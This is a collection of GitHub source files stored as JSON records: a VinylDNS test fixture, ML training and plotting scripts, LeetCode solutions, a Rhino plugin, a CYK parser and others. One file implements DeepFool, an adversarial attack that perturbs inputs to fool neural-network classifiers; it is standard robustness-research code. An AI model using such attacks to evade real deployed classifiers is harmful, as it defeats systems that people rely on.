\"keyName\": VinylDNSTestContext.dns_key_name,\n \"key\": VinylDNSTestContext.dns_key,\n \"algorithm\": VinylDNSTestContext.dns_key_algo,\n \"primaryServer\": VinylDNSTestContext.name_server_ip\n }\n }, status=202)\n self.shared_zone = shared_zone_change[\"zone\"]\n\n # wait until our zones are created\n self.ok_vinyldns_client.wait_until_zone_active(system_test_zone_change[\"zone\"][\"id\"])\n self.ok_vinyldns_client.wait_until_zone_active(ok_zone_change[\"zone\"][\"id\"])\n self.dummy_vinyldns_client.wait_until_zone_active(dummy_zone_change[\"zone\"][\"id\"])\n 
self.ok_vinyldns_client.wait_until_zone_active(ip6_reverse_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(ip6_16_nibble_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(ip4_reverse_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(classless_base_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(classless_zone_delegation_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(system_test_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(parent_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(ds_zone_change[\"zone\"][\"id\"])\n        self.ok_vinyldns_client.wait_until_zone_active(requires_review_zone_change[\"zone\"][\"id\"])\n        self.shared_zone_vinyldns_client.wait_until_zone_active(shared_zone_change[\"zone\"][\"id\"])\n\n        # initialize group activity\n        self.init_group_activity()\n\n        # initialize list zones, only do this when constructing the whole!\n        self.list_zones.setup()\n\n        # note: there is no state to load, the tests only need the client\n        self.list_zones_client = self.list_zones.client\n\n        # build the list of records; note: we do need to save the test records\n        self.list_records_context.setup()\n\n        # build the list of groups\n        self.list_groups_context.setup()\n        except Exception:\n            # Cleanup if setup fails\n            self.tear_down()\n            traceback.print_exc()\n            raise\n\n    def init_history(self):\n        # Initialize the zone history\n        # change the zone nine times so we have update events in zone change history,\n        # ten total changes including creation\n        for i in range(2, 11):\n            zone_update = copy.deepcopy(self.history_zone)\n            zone_update[\"connection\"][\"key\"] = VinylDNSTestContext.dns_key\n            zone_update[\"transferConnection\"][\"key\"] = VinylDNSTestContext.dns_key\n            zone_update[\"email\"] = \"i.changed.this.{0}.times@history-test.com\".format(i)\n            self.history_client.update_zone(zone_update, status=202)\n\n        # create some record sets\n        test_a = TestData.A.copy()\n        test_a[\"zoneId\"] = self.history_zone[\"id\"]\n        test_aaaa = TestData.AAAA.copy()\n        test_aaaa[\"zoneId\"] = self.history_zone[\"id\"]\n        test_cname = TestData.CNAME.copy()\n        test_cname[\"zoneId\"] = self.history_zone[\"id\"]\n\n        a_record = self.history_client.create_recordset(test_a, status=202)[\"recordSet\"]\n        aaaa_record = self.history_client.create_recordset(test_aaaa, status=202)[\"recordSet\"]\n        cname_record = self.history_client.create_recordset(test_cname, status=202)[\"recordSet\"]\n\n        # wait here for all the record sets to be created\n        self.history_client.wait_until_recordset_exists(a_record[\"zoneId\"], a_record[\"id\"])\n        self.history_client.wait_until_recordset_exists(aaaa_record[\"zoneId\"], aaaa_record[\"id\"])\n        self.history_client.wait_until_recordset_exists(cname_record[\"zoneId\"], cname_record[\"id\"])\n\n        # update the record sets\n        a_record_update = copy.deepcopy(a_record)\n        a_record_update[\"ttl\"] += 100\n        a_record_update[\"records\"][0][\"address\"] = \"9.9.9.9\"\n        a_change = self.history_client.update_recordset(a_record_update, status=202)\n\n        aaaa_record_update = copy.deepcopy(aaaa_record)\n        aaaa_record_update[\"ttl\"] += 100\n        aaaa_record_update[\"records\"][0][\"address\"] = \"2003:db8:0:0:0:0:0:4\"\n        aaaa_change = self.history_client.update_recordset(aaaa_record_update, status=202)\n\n        cname_record_update = copy.deepcopy(cname_record)\n        cname_record_update[\"ttl\"] += 100\n        
cname_record_update[\"records\"][0][\"cname\"] = \"changed-cname.\"\n        cname_change = self.history_client.update_recordset(cname_record_update, status=202)\n\n        self.history_client.wait_until_recordset_change_status(a_change, \"Complete\")\n        self.history_client.wait_until_recordset_change_status(aaaa_change, \"Complete\")\n        self.history_client.wait_until_recordset_change_status(cname_change, \"Complete\")\n\n        # delete the recordsets\n        self.history_client.delete_recordset(a_record[\"zoneId\"], a_record[\"id\"])\n        self.history_client.delete_recordset(aaaa_record[\"zoneId\"], aaaa_record[\"id\"])\n        self.history_client.delete_recordset(cname_record[\"zoneId\"], cname_record[\"id\"])\n\n        self.history_client.wait_until_recordset_deleted(a_record[\"zoneId\"], a_record[\"id\"])\n        self.history_client.wait_until_recordset_deleted(aaaa_record[\"zoneId\"], aaaa_record[\"id\"])\n        self.history_client.wait_until_recordset_deleted(cname_record[\"zoneId\"], cname_record[\"id\"])\n\n    def init_group_activity(self):\n        client = self.ok_vinyldns_client\n\n        group_name = f\"test-list-group-activity-max-item-success{self.partition_id}\"\n\n        members = [{\"id\": \"ok\"}]\n        new_group = {\n            \"name\": group_name,\n            \"email\": \"test@test.com\",\n            \"members\": members,\n            \"admins\": [{\"id\": \"ok\"}]\n        }\n        created_group = client.create_group(new_group, status=200)\n\n        update_groups = []\n        updated_groups = []\n        # each update changes the member\n        for runner in range(0, 10):\n            members = [{\"id\": \"dummy{0:0>3}\".format(runner)}]\n            update_groups.append({\n                \"id\": created_group[\"id\"],\n                \"name\": group_name,\n                \"email\": \"test@test.com\",\n                \"members\": members,\n                \"admins\": [{\"id\": \"ok\"}]\n            })\n            updated_groups.append(client.update_group(update_groups[runner][\"id\"], update_groups[runner], status=200))\n\n        self.group_activity_created = created_group\n        self.group_activity_updated = updated_groups\n\n    def tear_down(self):\n        \"\"\"\n        The ok_vinyldns_client is a zone admin on _all_ the zones.\n\n        We shouldn't have to do any checks now, as zone admins have full rights to all zones, including\n        deleting all records (even in the old shared model)\n        \"\"\"\n        try:\n            self.list_zones.tear_down()\n            self.list_records_context.tear_down()\n\n            if self.list_batch_summaries_context:\n                self.list_batch_summaries_context.tear_down(self)\n\n            if self.list_groups_context:\n                self.list_groups_context.tear_down()\n\n            for client in self.clients:\n                client.clear_zones()\n\n            for client in self.clients:\n                client.clear_groups()\n\n            # Close all clients\n            for client in self.clients:\n                client.tear_down()\n\n        except Exception:\n            traceback.print_exc()\n            raise\n\n    @staticmethod\n    def confirm_member_in_group(client, group):\n        retries = 2\n        success = group in client.list_all_my_groups(status=200)\n        while retries >= 0 and not success:\n            success = group in client.list_all_my_groups(status=200)\n            time.sleep(.05)\n            retries -= 1\n        assert_that(success, is_(True))\n","repo_name":"vinyldns/vinyldns","sub_path":"modules/api/src/test/functional/tests/shared_zone_test_context.py","file_name":"shared_zone_test_context.py","file_ext":"py","file_size_in_byte":28814,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"6"}
+{"seq_id":"11104655076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 30 17:09:26 2019\n\n@author: WJH\n\"\"\"\n#%%\nimport time\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.model_selection import StratifiedKFold\n\ndef elapsed(sec):\n    \"\"\"\n    Time calculation\n    \"\"\"\n    if sec<60:\n        
return str(sec)+\"sec\"\n    elif sec<(60*60):\n        return str(np.round(sec/60.0,2)) + \"min\"\n\ndef train_pred(model, train_X, train_y, val_X, val_y, test_X,epochs=2):\n    \"\"\"\n    Model training\n    \"\"\"\n    print(\"training begin.......\")\n    pred_val_y = np.zeros((val_y.shape[0],1))\n    pred_test_y = np.zeros((test_X.shape[0],1))\n    for e in range(epochs):\n        start_time = time.time()\n        model.fit(train_X,train_y,batch_size=512,epochs=1,validation_data=(val_X,val_y))\n        temp_val_y = model.predict([val_X],batch_size=1024,verbose=1)\n        pred_test_y += model.predict([test_X],batch_size=1024,verbose=1)/epochs\n        \n        best_thresh = 0.5\n        best_score = 0.0\n        for thresh in np.arange(0.1, 0.501, 0.01):\n            thresh = np.round(thresh, 2)\n            score = metrics.f1_score(val_y, (temp_val_y > thresh).astype(int))\n            if score > best_score:\n                best_thresh = thresh\n                best_score = score\n\n        print(\"Best Val F1 Score at {} is: {:.4f}\".format(best_thresh,best_score))\n        print(f\"epoch finished: {elapsed(time.time()-start_time)}\")\n        \n        pred_val_y += temp_val_y/epochs\n    \n    return pred_val_y, pred_test_y\n\ndef train_corss_val(model,train_X,train_y,test_X,epochs=2):\n    spliter = StratifiedKFold(n_splits=4, shuffle=False)\n    train_predict = np.zeros(train_y.shape)\n    test_predict = np.zeros(test_X.shape[0])\n    \n    stage3_time = time.time()\n    for fold_id,(train_idx,val_idx) in enumerate(spliter.split(train_X,train_y)):\n        print('FOLD:',fold_id)\n        X_train = train_X[train_idx]\n        y_train = train_y[train_idx]\n        X_val = train_X[val_idx]\n        y_val = train_y[val_idx]\n        \n        pred_val_y, pred_test_y = train_pred(model, X_train, y_train, X_val, y_val,test_X,epochs = 5)\n        train_predict[val_idx] = pred_val_y.reshape(-1)\n        test_predict += pred_test_y\n        \n    print(\"Cross Training model used time:\", elapsed(time.time()-stage3_time))\n    return train_predict,test_predict\n","repo_name":"jianhongwu/Kaggle-Quora-Insincere-Questions-Classification","sub_path":"models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"32469156868","text":"class Solution:\n    def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n        targets = collections.defaultdict(list)\n        for a, b in sorted(tickets,reverse=True): targets[a].append(b)\n        \n        route = []\n        \n        def visit(airport):\n            while targets[airport]: visit(targets[airport].pop())\n            route.append(airport)\n        \n        visit(\"JFK\")\n        \n        return route[::-1]\n","repo_name":"MdAbedin/leetcode","sub_path":"0301 - 0400/0332 Reconstruct Itinerary.py","file_name":"0332 Reconstruct Itinerary.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"}
+{"seq_id":"26566250459","text":"import pandas as pd\nimport seaborn as sns\n\nsns.set_theme(style=\"whitegrid\")\n\n\ndef get_plot_from_accuracy(**kwargs) -> None:\n    \"\"\"\n    Accuracy plot by position.\n    \"\"\"\n    df_list = []\n    for key, accuracy_dict in kwargs.items():\n        df = pd.DataFrame.from_dict(accuracy_dict, orient='index', columns=['accuracy']).head(8)\n        df['type'] = key\n        df_list.append(df)\n    g = sns.catplot(\n        data=pd.concat(df_list).reset_index(), kind=\"bar\",\n        x=\"index\", y=\"accuracy\", hue=\"type\",\n        palette=\"bone\", height=6, legend_out=False\n    )\n    g.set(ylim=(0.4, 0.7))\n    g.set_axis_labels(\"Sequence length\", \"accuracy@4\")\n    g.savefig(\"accuracy_by_position.pdf\")\n\n\ndef get_plot_from_distribution_by_pos(df: pd.DataFrame):\n    \"\"\"\n    Plot distribution by position 
from dataframe.\n \"\"\"\n df_melt = pd.melt(df,\n value_vars=['train_set', 'submission'],\n var_name='dataset_type',\n value_name='sequence_length',\n ignore_index=False)\n\n sns.set_style('white')\n sns.set_context('paper', font_scale=2)\n sns.set_palette(['#000000', '#ABABAB'])\n sns.set_style('ticks', {'axes.edgecolor': '0',\n 'xtick.color': '0',\n 'ytick.color': '0'})\n\n g = sns.catplot(\n data=df_melt.reset_index(), kind=\"bar\",\n x=\"index\", y=\"sequence_length\", hue=\"dataset_type\",\n ci=\"sd\", height=6, legend_out=False,\n )\n g.set_axis_labels(\"Sequence length\", \"Proportion\")\n new_labels = ['Training set', 'Submission set']\n for t, l in zip(g._legend.texts, new_labels):\n t.set_text(l)\n\n g._legend.set_title('')\n g.savefig(\"sequence_length_distribution.pdf\")\n","repo_name":"mbaigorria/booking-challenge-2021-recsys","sub_path":"recsys/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"947823067","text":"import pandas as pd\n\ndef read_data(uc_name):\n \"\"\"\n This function reads the data given specific school name and returns it.\n \"\"\"\n csv_location = \"../data/csv/ucop\"\n file_name = 'ucop' + '_' + uc_name + '_' + '2018' + '_' + 'auto' + '.csv'\n relative_path = csv_location + '/' + file_name\n salary_data = pd.read_csv(relative_path, thousands=',')\n return salary_data\n \ndef calculate_netsalary(salary_data):\n \"\"\"\n This function takes salary data and formats its columns in order to create net salary column.\n : param salary_data: (pd.DataFrame), salary data \n : return: salary_data_formatted: (pd.DataFrame), salary data added net salary column \n \"\"\"\n \n del salary_data['GrossPay'];\n # Turning pay columns into numeric ones and create TotalPay column:\n salary_data[['RegularPay', 'OvertimePay', 'OtherPay']] = salary_data[['RegularPay', 'OvertimePay', 'OtherPay']].apply(pd.to_numeric) \n salary_data['TotalPay'] = salary_data['RegularPay'] + salary_data['OvertimePay'] + salary_data['OtherPay']\n return salary_data\n\ndef create_mean_salaries(uc_schools):\n \"\"\"\n This function takes a list of uc schools and it returns mean salary values.\n : param uc_schools: (list), uc schools\n : return: mean_salaries: (list), mean salary values for specified uc schools\n \"\"\"\n assert len(uc_schools) > 0\n \n mean_salaries = list()\n for school in uc_schools:\n salary_data = read_data(school)\n salary_data = calculate_netsalary(salary_data)\n salary_data_professors = salary_data[salary_data['Title'].str.contains(\"PROF\")]\n total_payment = salary_data_professors['TotalPay'];\n mean_salaries.append(int(total_payment.mean())/1000) \n return mean_salaries\n","repo_name":"guptarohit994/ECE143_group25_project","sub_path":"statistical_analysis/helper_salary.py","file_name":"helper_salary.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15610052684","text":"import tools.utils_mi as xmutils \r\n\r\ndef getRouterInfo(deviceId, cookie):\r\n apiUrl = xmutils.getApi(xmutils.getUserRegion()) + \"/appgateway/third/miwifi/app/r/api/xqsystem/init_info\"\r\n \r\n data = {\r\n \"data\": r'{\"method\":\"POST\",\"params\":{\"deviceId\":\"' + deviceId + '\"}}'\r\n }\r\n\r\n return xmutils.sendPostRequest(apiUrl, data, 
cookie)","repo_name":"azwhikaru/miio-python","sub_path":"module/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"31538726334","text":"def revword(new):\r\n    new = new.lower().strip()[::-1]\r\n    return(new)\r\n\r\ndef countword():\r\n    fh = open(\"text.txt\" , \"r\")\r\n    Counter = 1\r\n    for line in fh:\r\n        new_word = ''\r\n        lineWords = line.split(\" \")\r\n        if len(lineWords) == 1:\r\n            W1 = lineWords[0].lower().strip()\r\n            print(W1 ,end ='')\r\n        else:\r\n            for j in lineWords:\r\n                Word = revword(j)\r\n                new_word += (Word + ' ')\r\n                if Word == W1:\r\n                    Counter += 1\r\n            print(new_word)\r\n    print(Counter)\r\ncountword()\r\n\r\n","repo_name":"LidorDahari/Advanced-data-mining-and-analysis-course","sub_path":"assignment 1/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"2248540171","text":"def vraag_leeftijd_gebruiker(vraag: str) -> int:\n    while True:\n        leeftijd_string = input(vraag)\n        if not leeftijd_string.isnumeric():\n            print(\"voer een getal in\")\n        elif int(leeftijd_string) > 130:\n            print(\"Zo oud is nog niemand geworden!\")\n        elif int(leeftijd_string) < 0:\n            print(\"U moet nog geboren worden\")\n        else:\n            leeftijd = int(leeftijd_string)\n            break\n    return leeftijd\ndef is_achttien(age : int) -> bool:\n    voldoet = False\n    if age >= 18:\n        voldoet = True\n    return voldoet\n    \n\nnaam = input(\"Hoe heet je?\")\nleeftijd = vraag_leeftijd_gebruiker(\"Hoe oud ben je?\")\njaren = is_achttien(leeftijd)\nprint(f\"hoi {naam}, je bent {leeftijd} oud en {jaren}\")","repo_name":"MaxQutimu/leren-programmeren","sub_path":"Leren Programmeren/M-05-Meer-Functions/voorbeeld.py","file_name":"voorbeeld.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"18542279050","text":"import torch\nfrom torch import nn\n\n\ndef deepfool(\n    model_fn,\n    x,\n    y,\n    device,\n    steps=50,\n    overshoot=0.02,\n    return_target_y=False\n):\n    x = x.clone().detach().to(device)\n    y = y.clone().detach().to(device)\n\n    batch_size = len(x)\n    correct = torch.tensor([True] * batch_size)\n    target_y = y.clone().detach().to(device)\n    curr_steps = 0\n\n    adv_x = []\n    for idx in range(batch_size):\n        x_temp = x[idx:idx + 1].clone().detach()\n        adv_x.append(x_temp)\n\n    while (True in correct) and (curr_steps < steps):\n        for idx in range(batch_size):\n            if not correct[idx]: continue\n            early_stop, pre, adv_x_temp = forward_indiv(model_fn, adv_x[idx], y[idx], overshoot)\n            adv_x[idx] = adv_x_temp\n            target_y[idx] = pre\n            if early_stop:\n                correct[idx] = False\n        curr_steps += 1\n\n    adv_x = torch.cat(adv_x).detach()\n\n    if return_target_y:\n        return adv_x, target_y\n    return adv_x\n\n\ndef forward_indiv(model, x, label, overshoot):\n    x.requires_grad = True\n    fs = get_logits(model, x)[0]\n    _, pre = torch.max(fs, dim=0)\n    if pre != label:\n        return (True, pre, x)\n\n    ws = construct_jacobian(fs, x)\n    x = x.detach()\n\n    f_0 = fs[label]\n    w_0 = ws[label]\n\n    wrong_classes = [i for i in range(len(fs)) if i != label]\n    f_k = fs[wrong_classes]\n    w_k = ws[wrong_classes]\n\n    f_prime = f_k - f_0\n    w_prime = w_k - w_0\n    value = torch.abs(f_prime) \\\n            / torch.norm(nn.Flatten()(w_prime), p=2, dim=1)\n    _, hat_L = torch.min(value, 0)\n\n    delta = (torch.abs(f_prime[hat_L])*w_prime[hat_L]\n             / 
(torch.norm(w_prime[hat_L], p=2)**2))\n\n    target_label = hat_L if hat_L < label else hat_L+1\n\n    adv_x = x + (1+ overshoot)*delta\n    adv_x = torch.clamp(adv_x, min=0, max=1).detach()\n    return (False, target_label, adv_x)\n\ndef get_logits(model, inputs, labels=None, *args, **kwargs):\n    logits = model(inputs)\n    return logits\n\n\ndef construct_jacobian(y, x):\n    x_grads = []\n    for idx, y_element in enumerate(y):\n        if x.grad is not None:\n            x.grad.zero_()\n        y_element.backward(retain_graph=(False or idx+1 < len(y)))\n        x_grads.append(x.grad.clone().detach())\n    return torch.stack(x_grads).reshape(*y.shape, *x.shape)","repo_name":"wxwmd/time-series-dl-attack","sub_path":"attacks/adversarial/cleverhans/whitebox/deepfool.py","file_name":"deepfool.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"72986217467","text":"import rhinoscriptsyntax as rs\nimport math\nimport random\n\n'''\n\nCopyright <2022> \n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\nWARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n'''\n\n# Calculate Soil requirements\n\n\ndef TreeMassing():\n    try:\n\n        litre = rs.GetReal(\"Enter the root ball litres, max 2000 Litres\", 400)\n        soilDepth = rs.GetReal('Enter the soil depth available in m', 0.8)\n        matureHeight = rs.GetReal('Enter the mature tree height in m', 5)\n        dbh = rs.GetReal(\n            'Enter the DBH at maturity in m, if unknown hit Enter', 0)\n        userPt = rs.GetPoint('Pick a point to place rootball')\n\n        rs.EnableRedraw(False)\n\n        # Dictionary for litre size to pot Rootball Diameter [0] / Rootball Height [1] / Calliper [2] / Height [3] / Spread [4]\n        # Figures obtained from https://winterhill.com.au/tree-sizes/\n        PotDict = {\n            25: [0.300, 0.250, 0.020, 1.000, 0.500],\n            45: [0.420, 0.350, 0.025, 2.000, 1.000],\n            75: [0.465, 0.500, 0.035, 2.500, 2.000],\n            100: [0.520, 0.560, 0.050, 3.500, 2.000],\n            200: [0.700, 0.625, 0.070, 4.500, 3.000],\n            400: [0.980, 0.715, 0.090, 6.000, 4.000],\n            600: [1.200, 0.600, 0.100, 6.000, 5.000],\n            800: [1.300, 0.600, 0.120, 7.000, 5.000],\n            1000: [1.500, 0.600, 0.150, 8.000, 5.000],\n            2000: [2.000, 0.800, 0.200, 9.000, 5.000],\n        }\n\n        def closest(lst, K):\n\n            return lst[min(range(len(lst)), key=lambda i: abs(lst[i]-K))]\n\n        def scale():\n            system = rs.UnitSystem()\n            if system == 2 or system == 3 or system == 4:\n                scaleFactorDict = {2: 1000, 3: 100, 4: 1}\n                scaleFactor = scaleFactorDict[system]\n                return scaleFactor\n\n            if system != 2 or system != 3 or system != 4:\n                return None\n\n        s = scale()\n\n        if s == None:\n            rs.MessageBox(\n                \"This tool can only be used in mm, cm or m model units\")\n            return None\n\n        # Calc for standard soil requirements as per Australian Standards\n\n        if dbh == 0:\n            dbh = ((matureHeight / 100) * 4) * 1000 # Gives a DBH in mm\n        # Gives a required soil volume in M3\n        reqSoil = (matureHeight * dbh) / 100\n        reqSoilRadius = math.sqrt(reqSoil / ((math.pi)*soilDepth))\n\n        # Add soil puck to doc\n        reqSoilRadiusCyl = rs.AddCylinder(\n            userPt, (soilDepth*s), (reqSoilRadius*s), cap=True)\n        rs.ObjectColor(reqSoilRadiusCyl, (150, 75, 0))\n\n        # Calc for size of rootball as per 
standard pot sizes\n        litreMatch = closest(list(PotDict.keys()), litre)\n        dia = (PotDict[litreMatch])[0]\n        height = (PotDict[litreMatch])[1]\n\n        # Add Rootball to doc\n        rootballCyl = rs.AddCylinder(userPt, (height*s), ((dia/2)*s))\n        rs.ObjectColor(rootballCyl, (0, 128, 0))\n        vec = (0, 0, ((soilDepth*s) - (height*s)))\n        rs.MoveObject(rootballCyl, vec)\n\n        # Add Tree model based on Dict\n        calliper = (PotDict[litreMatch])[2]\n        treeHeight = (PotDict[litreMatch])[3]\n        spread = (PotDict[litreMatch])[4]\n        vec02 = (0, 0, (((soilDepth*s) - (height*s))) + (height*s))\n\n        treeTrunk = rs.AddCylinder(userPt, (treeHeight*s), (calliper*s))\n        rs.ObjectColor(treeTrunk, (101, 67, 33))\n        rs.MoveObject(treeTrunk, vec02)\n        canopy = rs.AddSphere(userPt, ((spread/2)*s))\n        rs.ObjectColor(canopy, (33, 101, 67))\n        vec03 = (0, 0, (((soilDepth*s) - (height*s))) +\n                 (height*s) + (treeHeight*s) - ((spread/2)*s))\n        rs.MoveObject(canopy, vec03)\n\n        # Various Text Annotation\n        txt1 = rs.AddText('Rootball ' + 'Height = ' + str(height*s) + ', Diameter = ' + str(dia*s), userPt,\n                          height=(.1*s), font=\"Arial\", font_style=0, justification=2)\n\n        txt2 = rs.AddText('Soil Volume Requirement = ' + str(reqSoil) + ' m3', (userPt.X, (userPt.Y - (.2*s)), userPt.Z),\n                          height=(.1*s), font=\"Arial\", font_style=0, justification=2)\n\n        block = rs.AddBlock((reqSoilRadiusCyl, rootballCyl, treeTrunk, canopy, txt1, txt2), userPt,\n                            (\"Rootball and Soil \" + (str(random.random()))), delete_input=True)\n        rs.BlockDescription(block, 'Rootball ' + 'Height = ' + str(height*s) + ', Diameter = ' + str(dia*s)\n                            + ', Soil Volume Requirement = ' + str(reqSoil) + ' m3')\n\n        guid = rs.InsertBlock(block, userPt)\n        rs.ObjectName(guid, 'Rootball ' + 'Height = ' + str(height*s) + ', Diameter = ' + str(dia*s)\n                      + ', Soil Volume Requirement = ' + str(reqSoil) + ' m3')\n\n        rs.EnableRedraw(True)\n\n    except:\n        print(\"Failed to execute\")\n        rs.EnableRedraw(True)\n        return\n\n\nif __name__ == \"__main__\":\n    TreeMassing()\n","repo_name":"TSRChapman/LandArchTools-for-Rhino","sub_path":"TreeMassing.py","file_name":"TreeMassing.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"}
+{"seq_id":"22872315259","text":"#https://leetcode.com/problems/search-a-2d-matrix-ii/description/\n#time O(m+n), space O(1)\nclass Solution:\n    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n        m = len(matrix)\n        n = len(matrix[0])\n        row = 0\n        col = n-1\n        while row<m and col>=0:\n            if matrix[row][col]==target:\n                return True\n            elif matrix[row][col]=3.6.8\",\n    include_package_data=True,\n    has_ext_modules=lambda: True,\n    package_dir={\"\": \"SRA-Importer\"},\n    classifiers=[\n        'Programming Language :: Python',\n        'License :: OSI Approved :: MIT License'\n    ],\n    easy_install=\"ok_zip\"\n    )\n",
self.horizontal_rules: list[tuple[str, str, str]] = horizontal_rules\n self.vertical_rules: list[tuple[str, str, str]] = vertical_rules\n self.replace_rules: list[tuple[str, str]] = replace_rules\n\n def __call__(self,\n image: np.ndarray,\n w_step: int = 1,\n h_step: int = 1,\n min_h: int = 1,\n min_w: int = 1,\n window_size_h_step: int = 1,\n window_size_w_step: int = 1) -> bool:\n self._f = self.init_f(image, w_step, h_step, min_h, min_w, window_size_h_step, window_size_w_step)\n\n indexes = np.arange(np.product(image.shape)).reshape(image.shape)\n for h in range(min_h, image.shape[0]+1, window_size_h_step):\n for w in range(min_w, image.shape[1]+1, window_size_w_step):\n sl_windows = self.sliding_window(indexes, w, h, w_step, h_step)\n sl_windows = sl_windows.reshape((sl_windows.shape[0] * sl_windows.shape[1],\n sl_windows.shape[2], sl_windows.shape[3]))\n for label in self.nonterminal:\n for window in sl_windows:\n if self.H(window, label, min_w, window_size_w_step):\n self._f.append((window[0, 0], window[-1, -1], label))\n elif self.V(window, label, min_h, window_size_h_step):\n self._f.append((window[0, 0], window[-1, -1], label))\n elif self.R(window, label):\n self._f.append((window[0, 0], window[-1, -1], label))\n\n return (0, image.shape[0] * image.shape[1] - 1, self.image_symbol) in self._f\n\n @staticmethod\n def sliding_window(array: np.ndarray,\n width: int,\n height: int,\n w_step: int = 1,\n h_step: int = 1) -> np.ndarray:\n shape = ((array.shape[0] - height) // h_step + 1,) + ((array.shape[1] - width) // w_step + 1,) + (height, width)\n strides = array.strides[:-2] + (array.strides[-2] * h_step,) + (array.strides[-1] * w_step,) + array.strides[-2:]\n return np.lib.stride_tricks.as_strided(array, shape=shape, strides=strides)\n\n def init_f(self,\n image: np.ndarray,\n w_step: int = 1,\n h_step: int = 1,\n min_h: int = 1,\n min_w: int = 1,\n window_size_h_step: int = 1,\n window_size_w_step: int = 1) -> list[tuple[int, int, str]]:\n f: list[tuple[int, int, str]] = []\n\n flatten_image = image.flatten()\n indexes = np.arange(np.product(image.shape)).reshape(image.shape)\n\n for h in range(min_h, image.shape[0]+1, window_size_h_step):\n for w in range(min_w, image.shape[1]+1, window_size_w_step):\n sl_windows = self.sliding_window(indexes, w, h, w_step, h_step)\n sl_windows = sl_windows.reshape((sl_windows.shape[0] * sl_windows.shape[1],\n sl_windows.shape[2], sl_windows.shape[3]))\n for label in self.terminal:\n for window in sl_windows:\n if self.recognizer(flatten_image[window.flatten()].reshape(window.shape), label):\n f.append((window[0, 0], window[-1, -1], label))\n\n return f\n\n def H(self, idx_img: np.ndarray, label: str, min_w: int = 1, w_step: int = 1) -> bool:\n for w in range(min_w, idx_img.shape[1], w_step):\n left_part = idx_img[:, :w]\n right_part = idx_img[:, w:]\n for nl in self.nonterminal + self.terminal:\n for nr in self.nonterminal + self.terminal:\n if (left_part[0, 0], left_part[-1, -1], nl) in self._f \\\n and ((label, nl, nr) in self.horizontal_rules) \\\n and (right_part[0, 0], right_part[-1, -1], nr) in self._f:\n return True\n\n return False\n\n def V(self, idx_img: np.ndarray, label: str, min_h: int = 1, h_step: int = 1) -> bool:\n for h in range(min_h, idx_img.shape[0], h_step):\n upper_part = idx_img[:h, :]\n down_part = idx_img[h:, :]\n for nu in self.nonterminal + self.terminal:\n for nd in self.nonterminal + self.terminal:\n if (upper_part[0, 0], upper_part[-1, -1], nu) in self._f \\\n and ((label, nu, nd) in self.vertical_rules) \\\n and 
(down_part[0, 0], down_part[-1, -1], nd) in self._f:\n                        return True\n\n        return False\n\n    def R(self, idx_img: np.ndarray, label: str) -> bool:\n        for t in self.terminal + self.nonterminal:\n            if (idx_img[0, 0], idx_img[-1, -1], t) in self._f and ((label, t) in self.replace_rules):\n                return True\n\n        return False\n\n    def __parse_rules(self, rules: str) -> None:\n        raise NotImplementedError\n\n    def create_gh(self, left_symbol: str, right_s1: str, right_s2: str) -> None:\n        self.horizontal_rules.append((left_symbol, right_s1, right_s2))\n\n    def create_gv(self, left_symbol: str, right_s1: str, right_s2: str) -> None:\n        self.vertical_rules.append((left_symbol, right_s1, right_s2))\n\n    def create_g(self, s1: str, s2: str) -> None:\n        self.replace_rules.append((s1, s2))\n","repo_name":"Pavlo3P/Object-Recognition","sub_path":"algorithms/cyk/cyk.py","file_name":"cyk.py","file_ext":"py","file_size_in_byte":6084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
